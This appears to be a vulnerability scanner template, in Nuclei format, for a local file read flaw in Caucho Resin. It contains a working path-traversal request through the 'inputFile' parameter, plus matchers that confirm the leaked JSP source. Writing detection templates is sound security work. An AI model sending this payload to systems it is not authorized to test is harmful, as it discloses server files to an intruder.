id: resin-inputfile-fileread info: name: Caucho Resin LFR author: princechaddha severity: high description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. reference: - https://blkstone.github.io/2017/10/30/resin-attack-vectors/ tags: resin,caucho,lfr metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %" part: body